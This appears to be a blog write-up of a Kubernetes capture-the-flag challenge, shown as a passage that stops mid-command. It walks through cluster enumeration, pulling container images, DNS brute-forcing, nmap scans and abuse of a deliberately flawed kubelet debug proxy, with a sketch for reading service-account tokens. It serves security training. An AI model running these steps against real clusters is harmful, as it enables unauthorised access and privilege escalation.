Wiz Cloud Security Championship October 2025
Introduction
Another Kubernetes challenge, always good fun, and a nice one to tackle before my holiday :) Of course, I never found the time to write it up before leaving, so I'm doing so now.
Game of Pods
Starting off, the challenge description is:
You've gained access to a pod in the staging environment.
To beat this challenge, you'll have to spread throughout the cluster and escalate privileges. Can you reach the flag?
Good luck!
Within the terminal:
Loading...
Spinning up cluster... done
Tip: if terminal size is off, run `resize` to correct.
The flag is in kube-system.
Good luck!
Let’s start with some basic enumeration then.
root@test:~# kubectl auth whoami
ATTRIBUTE VALUE
Username system:serviceaccount:staging:test-sa
UID 0de08852-8557-40b2-8c4c-fa6fa193027b
Groups [system:serviceaccounts system:serviceaccounts:staging system:authenticated]
Extra: authentication.kubernetes.io/credential-id [JTI=3a02977f-08d1-4059-b5ad-51cbdaa0a3f9]
Extra: authentication.kubernetes.io/node-name [noder]
Extra: authentication.kubernetes.io/node-uid [801f7b5d-2332-443a-9d44-a190d1c9334d]
Extra: authentication.kubernetes.io/pod-name [test]
Extra: authentication.kubernetes.io/pod-uid [4f0c0d93-f622-47ad-b040-3f784afcc7ac]
root@test:~# kubectl auth can-i --list
Resources Non-Resource URLs Resource Names Verbs
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
pods [] [] [get list watch]
[/.well-known/openid-configuration/] [] [get]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks/] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
OK, so the main thing here is the ability to get, list, and watch pods within the current namespace (which should be staging, based on our service account).
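Under the hood, kubectl is just making authenticated HTTP calls with the mounted service account token. As a sketch (using the standard in-cluster paths and API routes; the helper name is mine), listing pods boils down to one GET:

```python
# Standard in-cluster service account paths (well-known Kubernetes conventions).
TOKEN_PATH = "/var/run/secrets/kubernetes.io/serviceaccount/token"
NS_PATH = "/var/run/secrets/kubernetes.io/serviceaccount/namespace"

def pod_list_request(namespace: str, token: str,
                     api_server: str = "https://kubernetes.default.svc"):
    """Build the URL and headers that `kubectl get pods` effectively uses."""
    url = f"{api_server}/api/v1/namespaces/{namespace}/pods"
    headers = {"Authorization": f"Bearer {token}"}
    return url, headers

# In-cluster you would read the real values:
#   token = open(TOKEN_PATH).read().strip()
#   namespace = open(NS_PATH).read().strip()
url, headers = pod_list_request("staging", "REDACTED-TOKEN")
print(url)  # https://kubernetes.default.svc/api/v1/namespaces/staging/pods
```

Anything kubectl can do with this token, a plain HTTP client can do too, which matters later when we start stealing other tokens.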
root@test:~# kubectl get pods
NAME READY STATUS RESTARTS AGE
test 1/1 Running 0 32d
A single pod… it's named test, the same as our prompt's hostname… I wonder if it's the pod we're sitting in.
root@test:~# kubectl get pod test -o yaml
apiVersion: v1
kind: Pod
metadata:
annotations:
kubectl.kubernetes.io/last-applied-configuration: |
{"apiVersion":"v1","kind":"Pod","metadata":{"annotations":{},"name":"test","namespace":"staging"},"spec":{"containers":[{"image":"hustlehub.azurecr.io/test:latest","imagePullPolicy":"IfNotPresent","name":"test"}],"serviceAccountName":"test-sa"}}
creationTimestamp: "2025-10-26T19:59:00Z"
name: test
namespace: staging
resourceVersion: "407"
uid: 4f0c0d93-f622-47ad-b040-3f784afcc7ac
spec:
containers:
- image: hustlehub.azurecr.io/test:latest
imagePullPolicy: IfNotPresent
name: test
resources: {}
terminationMessagePath: /dev/termination-log
terminationMessagePolicy: File
volumeMounts:
- mountPath: /var/run/secrets/kubernetes.io/serviceaccount
name: kube-api-access-9r88v
readOnly: true
dnsPolicy: ClusterFirst
enableServiceLinks: true
nodeName: noder
preemptionPolicy: PreemptLowerPriority
priority: 0
restartPolicy: Always
schedulerName: default-scheduler
securityContext: {}
serviceAccount: test-sa
serviceAccountName: test-sa
terminationGracePeriodSeconds: 30
tolerations:
- effect: NoExecute
key: node.kubernetes.io/not-ready
operator: Exists
tolerationSeconds: 300
- effect: NoExecute
key: node.kubernetes.io/unreachable
operator: Exists
tolerationSeconds: 300
volumes:
- name: kube-api-access-9r88v
projected:
defaultMode: 420
sources:
- serviceAccountToken:
expirationSeconds: 3607
path: token
- configMap:
items:
- key: ca.crt
path: ca.crt
name: kube-root-ca.crt
- downwardAPI:
items:
- fieldRef:
apiVersion: v1
fieldPath: metadata.namespace
path: namespace
status:
conditions:
- lastProbeTime: null
lastTransitionTime: "2025-10-26T19:59:19Z"
status: "True"
type: PodReadyToStartContainers
- lastProbeTime: null
lastTransitionTime: "2025-10-26T19:59:00Z"
status: "True"
type: Initialized
- lastProbeTime: null
lastTransitionTime: "2025-10-26T19:59:19Z"
status: "True"
type: Ready
- lastProbeTime: null
lastTransitionTime: "2025-10-26T19:59:19Z"
status: "True"
type: ContainersReady
- lastProbeTime: null
lastTransitionTime: "2025-10-26T19:59:00Z"
status: "True"
type: PodScheduled
containerStatuses:
- containerID: containerd://e4602154b08dd6b551d516d835212f57404d78eed27f81f13290f804fb19f4a3
image: hustlehub.azurecr.io/test:latest
imageID: hustlehub.azurecr.io/test@sha256:6c49ed1562fc0394f3e50549895776c5cac96524b011b8c4a26dea211e9d4610
lastState: {}
name: test
ready: true
restartCount: 0
started: true
state:
running:
startedAt: "2025-10-26T19:59:19Z"
volumeMounts:
- mountPath: /var/run/secrets/kubernetes.io/serviceaccount
name: kube-api-access-9r88v
readOnly: true
recursiveReadOnly: Disabled
hostIP: 172.30.0.2
hostIPs:
- ip: 172.30.0.2
phase: Running
podIP: 10.42.0.2
podIPs:
- ip: 10.42.0.2
qosClass: BestEffort
startTime: "2025-10-26T19:59:00Z"
Considering all the details (same namespace, same pod name, same service account, and so on), this looks like the very pod we are in. Maybe we need to enumerate it further? We could trawl through the filesystem, or we could pull the image and look at how it was built, which might be quicker.
Checking for registry tools installed in the container, we do have oras, a client for OCI registries and artifacts.
Let’s see what images are available in the registry.
root@test:/# oras repo ls hustlehub.azurecr.io
k8s-debug-bridge
test
OK. So there is the test image that we are using, but also a k8s-debug-bridge. Let's quickly check test first, though I have a hunch that k8s-debug-bridge is the thing we actually need to play with.
root@test:/# oras repo tags hustlehub.azurecr.io/test
latest
root@test:~# mkdir test
root@test:~# oras copy hustlehub.azurecr.io/test:latest --to-oci-layout test
✓ Copied application/vnd.in-toto+json 1.11/1.11 KB 100.00% 468µs
  └─ sha256:70677afa5d2823b1581158f4c3b1fb060afdc71829dfdaf7545fc1c7cb0cd1f6
✓ Copied application/vnd.oci.image.config.v1+json 2.79/2.79 KB 100.00% 344µs
  └─ sha256:eacddf11be2eac3aab631212b981679513e2ad7c3026a47dcf36881dafed3e39
✓ Copied application/vnd.oci.image.config.v1+json 167/167 B 100.00% 17µs
  └─ sha256:90b0a22ef30fe6fc89f36301285bb44625e67997a2dfeb5a85a6531973c65c44
✓ Copied application/vnd.oci.image.layer.v1.tar+gzip 3.26/3.26 MB 100.00% 2s
  └─ sha256:44cf07d57ee4424189f012074a59110ee2065adfdde9c7d9826bebdffce0a885
✓ Copied application/vnd.oci.image.layer.v1.tar+gzip 3.62/3.62 MB 100.00% 2s
  └─ sha256:218e134d5c22a9dd4e8203cb8ce718f76f4a25b016b8c5017f3d59a1ddc33f17
✓ Copied application/vnd.oci.image.layer.v1.tar+gzip 37.6/37.6 MB 100.00% 10s
  └─ sha256:160842b5a7fbfea2b2d19e155e2ac5b7a2ea3686b38134f92bfab13c49eed602
✓ Copied application/vnd.oci.image.manifest.v1+json 566/566 B 100.00% 205µs
  └─ sha256:9496f2d4fe66165397c57b03d98bb237e5dcde53b29bcf83bd62f782523562d2
✓ Copied application/vnd.oci.image.layer.v1.tar+gzip 236/236 B 100.00% 231µs
  └─ sha256:4d249df000ffd8a30ca7358848d9bb270f8a7fb68846bb9b23d9aeeec7f8dc3e
✓ Copied application/vnd.oci.image.layer.v1.tar+gzip 32/32 B 100.00% 12µs
  └─ sha256:4f4fb700ef54461cfa02571ae0db9a0dc1e0cdb5577484a6d75e68dc38e8acc1
✓ Copied application/vnd.oci.image.manifest.v1+json 1.21/1.21 KB 100.00% 8ms
  └─ sha256:289d14a5688ca97bd4748119d364d14cbe7d4d94d0a09b07abeaebd0a8665220
✓ Copied application/vnd.oci.image.index.v1+json 856/856 B 100.00% 284µs
  └─ sha256:6c49ed1562fc0394f3e50549895776c5cac96524b011b8c4a26dea211e9d4610
Copied [registry] hustlehub.azurecr.io/test:latest => [oci-layout] test
Digest: sha256:6c49ed1562fc0394f3e50549895776c5cac96524b011b8c4a26dea211e9d4610
From the oras output, we can see which blobs are the image configs, and view them.
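Rather than eyeballing blob sizes, you can resolve the config digest mechanically: index.json points at a manifest (or a nested index for multi-arch images), and the manifest's config field names the config blob. A rough sketch, with helper names of my own:

```python
import json
import os

def read_blob(layout: str, digest: str) -> bytes:
    # Blobs live at blobs/<algorithm>/<hex> in an OCI image layout.
    algo, hexval = digest.split(":", 1)
    with open(os.path.join(layout, "blobs", algo, hexval), "rb") as f:
        return f.read()

def config_digest(layout: str) -> str:
    """Follow index.json -> (nested indexes) -> manifest -> config digest."""
    with open(os.path.join(layout, "index.json")) as f:
        desc = json.load(f)["manifests"][0]
    doc = json.loads(read_blob(layout, desc["digest"]))
    # Image indexes carry a "manifests" list; descend until we hit a manifest.
    while "manifests" in doc:
        doc = json.loads(read_blob(layout, doc["manifests"][0]["digest"]))
    return doc["config"]["digest"]
```

The returned digest names the blob you then pipe through jq, as below.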
root@test:~/test/blobs/sha256# cat eacddf11be2eac3aab631212b981679513e2ad7c3026a47dcf36881dafed3e39 | jq
{
"architecture": "amd64",
"config": {
"Env": [
"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
"TERM=xterm-256color",
"PS1=\\[\\e]0;\\u@\\h: \\w\\a\\]\\[\\e[1;32m\\]\\u@\\h\\[\\e[0m\\]:\\[\\e[1;34m\\]\\w\\[\\e[0m\\]\\$ "
],
"Cmd": [
"sh",
"-c",
"sleep infinity"
],
"WorkingDir": "/root",
"ArgsEscaped": true
},
"created": "2025-10-22T19:59:52.238381172Z",
"history": [
{
"created": "2025-02-14T03:03:06Z",
"created_by": "ADD alpine-minirootfs-3.18.12-x86_64.tar.gz / # buildkit",
"comment": "buildkit.dockerfile.v0"
},
{
"created": "2025-02-14T03:03:06Z",
"created_by": "CMD [\"/bin/sh\"]",
"comment": "buildkit.dockerfile.v0",
"empty_layer": true
},
{
"created": "2025-10-22T19:59:44.461503585Z",
"created_by": "COPY --chown=root:root --chmod=755 coredns-enum /usr/bin/coredns-enum # buildkit",
"comment": "buildkit.dockerfile.v0"
},
{
"created": "2025-10-22T19:59:52.217281797Z",
"created_by": "RUN /bin/sh -c apk add --no-cache curl jq bash iproute2 bind-tools nmap wget && rm -rf /var/cache/apk/* && curl -LO \"https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl\" && install -o root -g root -m 0755 kubectl /usr/bin/kubectl && rm kubectl && ORAS_VERSION=\"1.3.0\" && curl -LO \"https://github.com/oras-project/oras/releases/download/v${ORAS_VERSION}/oras_${ORAS_VERSION}_linux_amd64.tar.gz\" && tar -xzf oras_${ORAS_VERSION}_linux_amd64.tar.gz oras && chown root:0 oras && mv oras /usr/bin/oras && rm -f oras_${ORAS_VERSION}_linux_amd64.tar.gz && touch -t 202508081200 /usr/bin/coredns-enum /usr/bin/kubectl /usr/bin/oras && rm -rf /root/.cache # buildkit",
"comment": "buildkit.dockerfile.v0"
},
{
"created": "2025-10-22T19:59:52.229396256Z",
"created_by": "COPY --chown=root:root bashrc /root/.bashrc # buildkit",
"comment": "buildkit.dockerfile.v0"
},
{
"created": "2025-10-22T19:59:52.238381172Z",
"created_by": "ENV TERM=xterm-256color PS1=\\[\\e]0;\\u@\\h: \\w\\a\\]\\[\\e[1;32m\\]\\u@\\h\\[\\e[0m\\]:\\[\\e[1;34m\\]\\w\\[\\e[0m\\]\\$ ",
"comment": "buildkit.dockerfile.v0",
"empty_layer": true
},
{
"created": "2025-10-22T19:59:52.238381172Z",
"created_by": "WORKDIR /root",
"comment": "buildkit.dockerfile.v0"
},
{
"created": "2025-10-22T19:59:52.238381172Z",
"created_by": "CMD [\"sh\" \"-c\" \"sleep infinity\"]",
"comment": "buildkit.dockerfile.v0",
"empty_layer": true
}
],
"os": "linux",
"rootfs": {
"type": "layers",
"diff_ids": [
"sha256:f44f286046d9443b2aeb895c0e1f4e688698247427bca4d15112c8e3432a803e",
"sha256:bbd5df938c0dfc873e9f8bd7f70395fb260685c0492af3b2cae0fa1a7fc02b2d",
"sha256:fd306fa8fee7ddc737cad5fceba35895b0b1875836c4b1181f952e6ca6f43046",
"sha256:14c22531dce13efcd8dcfbb00beae124c1d4406716620577a65a23cf5895cb25",
"sha256:5f70bf18a086007016e948b04aed3b82103a36bea41755b6cddfaf10ace3c6ef"
]
}
}
So they give us coredns-enum (I think I missed this on my original run and downloaded it into the container myself xD), plus nmap, some miscellaneous networking tools, and oras. Otherwise there's not much in here.
OK, let’s look at the k8s-debug-bridge.
root@test:~# oras repo tags hustlehub.azurecr.io/k8s-debug-bridge
latest
root@test:~# oras copy hustlehub.azurecr.io/k8s-debug-bridge:latest --to-oci-layout k8s-debug-bridge/
✓ Copied application/vnd.oci.image.config.v1+json 167/167 B 100.00%
  └─ sha256:3dc1aacf9e7b7aa152fe92304c74cc2822539cb27e25fe99282b221746d2636a
✓ Copied application/vnd.in-toto+json 1.28/1.28 KB 100.00%
  └─ sha256:b65292a38d914152cbd37c828a36b81cd3da1acfd0edaa77bf322332c41bd024
✓ Copied application/vnd.oci.image.config.v1+json 1.86/1.86 KB 100.00%
  └─ sha256:7162697db986f5e02d9091e5f29193a473f5fbd2d7b186243813052c9b7b5ed7
✓ Copied application/vnd.oci.image.manifest.v1+json 566/566 B 100.00%
  └─ sha256:65d8defc58f5d756d55f44a42c1d19ac3b4ea1944ec8f21cfcef70beba9a44db
✓ Copied application/vnd.oci.image.layer.v1.tar+gzip 289/289 KB 100.00%
  └─ sha256:049d988b9bf0a21ad8597ad57e538949be03f703977d21d9d30b7da3fc92f983
✓ Copied application/vnd.oci.image.layer.v1.tar+gzip 3.26/3.26 MB 100.00%
  └─ sha256:44cf07d57ee4424189f012074a59110ee2065adfdde9c7d9826bebdffce0a885
✓ Copied application/vnd.oci.image.layer.v1.tar+gzip 32/32 B 100.00%
  └─ sha256:4f4fb700ef54461cfa02571ae0db9a0dc1e0cdb5577484a6d75e68dc38e8acc1
✓ Copied application/vnd.oci.image.layer.v1.tar+gzip 2.2/2.2 MB 100.00%
  └─ sha256:af22b6a1bf08e5477608575f8890ef7cbc61994011a54d37a5edd5630a6b9a6f
✓ Copied application/vnd.oci.image.layer.v1.tar+gzip 1.84/1.84 KB 100.00%
  └─ sha256:f055869862fb70dd5a7f7c2b9ac1e9d50b886d9a3b55c1e288ad1ba76644bdae
✓ Copied application/vnd.oci.image.manifest.v1+json 1.21/1.21 KB 100.00%
  └─ sha256:a705d5c6dd51fcfc0c8c7b8989df26b02a88740ae5b696fa8e65ac31f427b72e
✓ Copied application/vnd.oci.image.index.v1+json 856/856 B 100.00%
  └─ sha256:0ed2d53c35dc594b40217506326e2f099dc8823fa5838a65736bfce6f1b0115f
Copied [registry] hustlehub.azurecr.io/k8s-debug-bridge:latest => [oci-layout] k8s-debug-bridge/
Digest: sha256:0ed2d53c35dc594b40217506326e2f099dc8823fa5838a65736bfce6f1b0115f
The blobs are just files on disk, so I installed file and used a quick bash one-liner to untar all the gzip layers en masse.
root@test:~/k8s-debug-bridge/blobs/sha256# file * | grep gzip | cut -d : -f 1 | xargs -n 1 tar zxvf
etc/
etc/apk/
etc/apk/protected_paths.d/
etc/apk/protected_paths.d/ca-certificates.list
etc/apk/world
etc/ca-certificates/
etc/ca-certificates/update.d/
[..SNIP..]
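For reference, the same en-masse extraction can be sketched in Python without file(1), by sniffing the gzip magic bytes (0x1f 0x8b) on each blob (helper name is mine):

```python
import os
import tarfile

def extract_gzip_layers(blob_dir: str, dest: str) -> list[str]:
    """Extract every gzip-compressed blob in blob_dir as a tarball into dest."""
    extracted = []
    for name in sorted(os.listdir(blob_dir)):
        path = os.path.join(blob_dir, name)
        if not os.path.isfile(path):
            continue
        with open(path, "rb") as f:
            magic = f.read(2)
        if magic == b"\x1f\x8b":  # gzip magic bytes; JSON configs won't match
            with tarfile.open(path, "r:gz") as tar:
                tar.extractall(dest)
            extracted.append(name)
    return extracted
```

Non-gzip blobs (manifests, configs) are skipped automatically, which is exactly what the `file | grep gzip` filter was doing.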
With everything extracted, we can browse the filesystem, and there are some interesting files within /root/.
root@test:~/k8s-debug-bridge/blobs/sha256# ls root/
TODO k8s-debug-bridge k8s-debug-bridge.go
This feels like a good place to investigate, let’s start with the TODO.
root@test:~/k8s-debug-bridge/blobs/sha256/root# cat TODO
- Remove source code from our images
- Achieve AGI
Well, the first one makes sense, considering we can see the .go source code. The AGI… sure… that would be good. Not much useful information here. Let’s dig into the source code.
// A simple debug bridge to offload debugging requests from the api server to the kubelet.
package main
import (
"crypto/tls"
"encoding/json"
"fmt"
"io"
"io/ioutil"
"log"
"net"
"net/http"
"net/url"
"os"
"strings"
)
type Request struct {
NodeIP string `json:"node_ip"`
PodName string `json:"pod"`
PodNamespace string `json:"namespace,omitempty"`
ContainerName string `json:"container,omitempty"`
}
var (
httpClient = &http.Client{
Transport: &http.Transport{
TLSClientConfig: &tls.Config{
InsecureSkipVerify: true,
},
},
}
serviceAccountToken string
nodeSubnet string
)
func init() {
tokenBytes, err := ioutil.ReadFile("/var/run/secrets/kubernetes.io/serviceaccount/token")
if err != nil {
log.Fatalf("Failed to read service account token: %v", err)
}
serviceAccountToken = strings.TrimSpace(string(tokenBytes))
nodeIP := os.Getenv("NODE_IP")
if nodeIP == "" {
log.Fatal("NODE_IP environment variable is required")
}
nodeSubnet = nodeIP + "/24"
}
func main() {
http.HandleFunc("/logs", handleLogRequest)
http.HandleFunc("/checkpoint", handleCheckpointRequest)
fmt.Println("k8s-debug-bridge starting on :8080")
http.ListenAndServe(":8080", nil)
}
func handleLogRequest(w http.ResponseWriter, r *http.Request) {
handleRequest(w, r, "containerLogs", http.MethodGet)
}
func handleCheckpointRequest(w http.ResponseWriter, r *http.Request) {
handleRequest(w, r, "checkpoint", http.MethodPost)
}
func handleRequest(w http.ResponseWriter, r *http.Request, kubeletEndpoint string, method string) {
req, err := parseRequest(w, r) ; if err != nil {
return
}
targetUrl := fmt.Sprintf("https://%s:10250/%s/%s/%s/%s", req.NodeIP, kubeletEndpoint, req.PodNamespace, req.PodName, req.ContainerName)
if err := validateKubeletUrl(targetUrl); err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
resp, err := queryKubelet(targetUrl, method) ; if err != nil {
http.Error(w, fmt.Sprintf("Failed to fetch %s: %v", method, err), http.StatusInternalServerError)
return
}
w.Header().Set("Content-Type", "application/octet-stream")
w.Write(resp)
}
func parseRequest(w http.ResponseWriter, r *http.Request) (*Request, error) {
if r.Method != http.MethodPost {
http.Error(w, "Method not allowed", http.StatusMethodNotAllowed)
return nil, fmt.Errorf("invalid method")
}
var req Request = Request{
PodNamespace: "app",
PodName: "app-blog",
ContainerName: "app-blog",
}
if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
http.Error(w, "Invalid JSON", http.StatusBadRequest)
return nil, err
}
if req.NodeIP == "" {
http.Error(w, "node_ip is required", http.StatusBadRequest)
return nil, fmt.Errorf("missing required fields")
}
return &req, nil
}
func validateKubeletUrl(targetURL string) (error) {
parsedURL, err := url.Parse(targetURL) ; if err != nil {
return fmt.Errorf("failed to parse URL: %w", err)
}
// Validate target is an IP address
if net.ParseIP(parsedURL.Hostname()) == nil {
return fmt.Errorf("invalid node IP address: %s", parsedURL.Hostname())
}
// Validate IP address is in the nodes /16 subnet
if !isInNodeSubnet(parsedURL.Hostname()) {
return fmt.Errorf("target IP %s is not in the node subnet", parsedURL.Hostname())
}
// Prevent self-debugging
if strings.Contains(parsedURL.Path, "k8s-debug-bridge") {
return fmt.Errorf("cannot self-debug, received k8s-debug-bridge in parameters")
}
// Validate namespace is app
pathParts := strings.Split(strings.Trim(parsedURL.Path, "/"), "/")
if len(pathParts) < 3 {
return fmt.Errorf("invalid URL path format")
}
if pathParts[1] != "app" {
return fmt.Errorf("only access to the app namespace is allowed, got %s", pathParts[1])
}
return nil
}
func queryKubelet(url, method string) ([]byte, error) {
req, err := http.NewRequest(method, url, nil)
if err != nil {
return nil, fmt.Errorf("failed to create request: %w", err)
}
req.Header.Set("Authorization", "Bearer "+serviceAccountToken)
log.Printf("Making request to kubelet: %s", url)
resp, err := httpClient.Do(req)
if err != nil {
return nil, fmt.Errorf("failed to connect to kubelet: %w", err)
}
defer resp.Body.Close()
if resp.StatusCode != http.StatusOK {
body, _ := io.ReadAll(resp.Body)
log.Printf("Kubelet error response: %d - %s", resp.StatusCode, string(body))
return nil, fmt.Errorf("kubelet returned status %d: %s", resp.StatusCode, string(body))
}
return io.ReadAll(resp.Body)
}
func isInNodeSubnet(targetIP string) bool {
target := net.ParseIP(targetIP)
if target == nil {
return false
}
_, subnet, err := net.ParseCIDR(nodeSubnet)
if err != nil {
return false
}
return subnet.Contains(target)
}
OK, so analysing this code, we can observe a few things:
- It listens on port 8080 (hardcoded) and exposes two endpoints: /logs and /checkpoint
- Requests to these must be POSTs with a JSON payload containing node_ip, pod, namespace (optional), and container (optional)
- It uses those parameters to build a request to port 10250 (the kubelet) on the given node IP, hitting the relevant kubelet endpoint for logs or checkpoints
- There are a number of validations along the way that we may need to bypass
- It authenticates to the kubelet with its own service account token
I assume this has been deployed somewhere in the cluster, so we need to find it. The first stop is always DNS; running coredns-enum without arguments gives:
root@test:~/k8s-debug-bridge/blobs/sha256/root# coredns-enum
12:40PM INF Detected nameserver as 10.43.1.10:53
12:40PM INF Falling back to bruteforce mode
Error: problem getting apiserver cert
Looks like we need to pass in a CIDR range to scan. We can get a starting point for the service IP range from the API server address in the environment variables, and just assume a /16 from there.
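That assumption is just widening the service IP to its containing /16; in Python terms:

```python
import ipaddress

api_server = "10.43.1.1"  # from KUBERNETES_SERVICE_HOST
# strict=False masks off the host bits, giving the containing network.
svc_range = ipaddress.ip_network(f"{api_server}/16", strict=False)
print(svc_range)                # 10.43.0.0/16
print(svc_range.num_addresses)  # 65536
```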
root@test:~/k8s-debug-bridge/blobs/sha256/root# env | grep -i service_host
KUBERNETES_SERVICE_HOST=10.43.1.1
root@test:~/k8s-debug-bridge/blobs/sha256/root# coredns-enum --cidr 10.43.1.1/16
12:43PM INF Detected nameserver as 10.43.1.10:53
12:43PM INF Falling back to bruteforce mode
12:43PM INF Scanning range 10.43.0.0 to 10.43.255.255, 65536 hosts
+-------------+------------------+-------------+--------------------+-----------+
| NAMESPACE | NAME | SVC IP | SVC PORT | ENDPOINTS |
+-------------+------------------+-------------+--------------------+-----------+
| app | app-blog-service | 10.43.1.36 | ?? | |
| | k8s-debug-bridge | 10.43.1.168 | ?? | |
| default | kubernetes | 10.43.1.1 | 443/tcp (https) | |
| kube-system | kube-dns | 10.43.1.10 | 53/tcp (dns-tcp) | |
| | | | 9153/tcp (metrics) | |
| | | | 53/udp (dns) | |
+-------------+------------------+-------------+--------------------+-----------+
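The bruteforce mode works, as far as I can tell, because kube-dns publishes PTR records for service IPs, so discovery reduces to reverse lookups across the CIDR. A minimal single-threaded sketch of the idea (my own helper names; no claim this matches coredns-enum's internals):

```python
import ipaddress
import socket

def ptr_name(ip: str) -> str:
    """The in-addr.arpa name a reverse lookup queries for."""
    return ipaddress.ip_address(ip).reverse_pointer

def discover_services(cidr: str) -> dict[str, str]:
    """Reverse-resolve every IP in the range; hits are cluster services."""
    found = {}
    for ip in ipaddress.ip_network(cidr).hosts():
        try:
            name, _, _ = socket.gethostbyaddr(str(ip))
            found[str(ip)] = name  # e.g. kube-dns.kube-system.svc.cluster.local
        except (socket.herror, OSError):
            pass  # no PTR record for this IP
    return found

print(ptr_name("10.43.1.10"))  # 10.1.43.10.in-addr.arpa
```

The returned names encode the namespace (name.namespace.svc.cluster.local), which is how the tool fills in that table.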
Nice, we can see two services within the app namespace. That's good, as the bridge's code checks that the namespace is set to app. The app-blog-service is also worth looking into. I wonder if our service account has any permissions in that namespace.
root@test:~/k8s-debug-bridge/blobs/sha256/root# kubectl -n app auth can-i --list
Resources Non-Resource URLs Resource Names Verbs
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[/.well-known/openid-configuration/] [] [get]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks/] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
Nope, never mind. I assume k8s-debug-bridge is listening on 8080; we can validate that with an nmap scan.
root@test:~/k8s-debug-bridge/blobs/sha256/root# nmap 10.43.1.168 -p 8080
Starting Nmap 7.93 ( https://nmap.org ) at 2025-11-28 12:47 UTC
Nmap scan report for k8s-debug-bridge.app.svc.cluster.local (10.43.1.168)
Host is up (0.00074s latency).
PORT STATE SERVICE
8080/tcp filtered http-proxy
Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds
Damn. Maybe not.
root@test:~/k8s-debug-bridge/blobs/sha256/root# nmap 10.43.1.168 -p-
Starting Nmap 7.93 ( https://nmap.org ) at 2025-11-28 12:48 UTC
Nmap scan report for k8s-debug-bridge.app.svc.cluster.local (10.43.1.168)
Host is up (0.000045s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 104.44 seconds
OK, it's on port 80; the service must be remapping it. Let's try getting the logs of the app-blog pod through the bridge. For that we need the node IP. We don't know which node it's on, but we can guess based on our own node's IP. The code also has default values for the pod and container names, so we can try those.
root@test:~/k8s-debug-bridge/blobs/sha256/root# kubectl get pods -o yaml | grep hostIP:
hostIP: 172.30.0.2
root@test:~/k8s-debug-bridge/blobs/sha256/root# curl http://k8s-debug-bridge.app/logs -d '{"node_ip": "172.30.0.2", "pod": "app-blog", "namespace": "app", "container": "app-blog"}'
2025/10/26 19:59:15 Starting server on port 5000
Well… that worked, nice. Nothing useful in the logs themselves, but they do tell us the app listens on port 5000. I wonder if there is something there?
root@test:~/k8s-debug-bridge/blobs/sha256/root# nmap -p- -T5 app-blog-service.app
Starting Nmap 7.93 ( https://nmap.org ) at 2025-11-28 12:54 UTC
Nmap scan report for app-blog-service.app (10.43.1.36)
Host is up (0.000044s latency).
rDNS record for 10.43.1.36: app-blog-service.app.svc.cluster.local
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 54.41 seconds
Let’s start investigating it with curl.
root@test:~/k8s-debug-bridge/blobs/sha256/root# curl app-blog-service.app
<a href="/login">See Other</a>.
root@test:~/k8s-debug-bridge/blobs/sha256/root# curl app-blog-service.app/login
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>HustleHub - 10x Your Net Worth</title>
<link rel="stylesheet" href="/static/styles.css">
</head>
<body class="auth-page">
<div class="container">
<div class="card">
<h1>HustleHub</h1>
<p class="tagline">Passive income awaits. Your McLaren's not gonna buy itself.</p>
<h2>Login</h2>
<form method="POST" action="/login">
<div class="form-group">
<label for="username">Username</label>
<input type="text" id="username" name="username" required autofocus>
</div>
<div class="form-group">
<label for="password">Password</label>
<input type="password" id="password" name="password" required>
</div>
<button type="submit" class="btn">Access Dashboard</button>
</form>
<p class="footer-link">Not grinding yet? <a href="/register">Register now</a></p>
</div>
</div>
</body>
</html>
root@test:~/k8s-debug-bridge/blobs/sha256/root# curl app-blog-service.app/register
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>HustleHub - 10x Your Net Worth</title>
<link rel="stylesheet" href="/static/styles.css">
</head>
<body class="auth-page">
<div class="container">
<div class="card">
<h1>HustleHub</h1>
<p class="tagline">Open 10 LLCs before lunch. Scale to 7 figures by dinner.</p>
<h2>Register for Alpha Access</h2>
<form method="POST" action="/register">
<div class="form-group">
<label for="username">Username</label>
<input type="text" id="username" name="username" required autofocus>
</div>
<div class="form-group">
<label for="password">Password</label>
<input type="password" id="password" name="password" required>
</div>
<div class="form-group">
<label for="confirm">Confirm Password</label>
<input type="password" id="confirm" name="confirm" required>
</div>
<button type="submit" class="btn">Join the Grind</button>
</form>
<p class="footer-link">Already grinding? <a href="/login">Log in</a></p>
</div>
</div>
</body>
</html>
root@test:~/k8s-debug-bridge/blobs/sha256/root# curl app-blog-service.app/register -X POST -d "username=skybound&password=testing&confirm=testing" -v
Note: Unnecessary use of -X or --request, POST is already inferred.
* Host app-blog-service.app:80 was resolved.
* IPv6: (none)
* IPv4: 10.43.1.36
* Trying 10.43.1.36:80...
